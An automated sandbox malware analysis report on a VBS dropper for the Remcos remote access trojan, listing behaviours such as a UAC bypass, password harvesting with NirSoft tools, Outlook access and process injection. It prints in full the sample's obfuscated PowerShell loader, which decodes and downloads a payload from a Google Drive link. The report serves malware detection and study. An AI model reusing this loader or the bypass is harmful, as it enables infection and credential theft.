Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-c4at1ssfnh
Target 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs
SHA256 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753

Threat Level: Known bad

The file 36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft MailPassView

Detected Nirsoft tools

NirSoft WebBrowserPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 02:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 02:37

Reported

2024-11-05 02:40

Platform

win7-20240708-en

Max time kernel

150s

Max time network

125s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? 
ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. 
T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. 
ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab8C0C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2268-20-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2268-22-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2268-21-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2268-23-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-24-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-25-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-26-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-27-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-28-0x000007FEF58FE000-0x000007FEF58FF000-memory.dmp

memory/2268-29-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-30-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-31-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

memory/2268-32-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 02:37

Reported

2024-11-05 02:40

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

Signatures

Remcos

Tags: rat remcos

Remcos family

Tags: remcos

UAC bypass

Tags: evasion trojan

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Detected Nirsoft tools

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook accounts

Tags: collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3252 set thread context of 1748 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3252 set thread context of 2920 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3252 set thread context of 4604 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Tags: discovery

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3664 wrote to memory of 1996 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3664 wrote to memory of 1996 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1516 wrote to memory of 3252 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 1516 wrote to memory of 3252 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3252 wrote to memory of 3468 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3252 wrote to memory of 3468 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3252 wrote to memory of 3468 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 3060 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3468 wrote to memory of 3060 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3468 wrote to memory of 3060 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3252 wrote to memory of 1092 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3252 wrote to memory of 1092 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 624 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 624 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
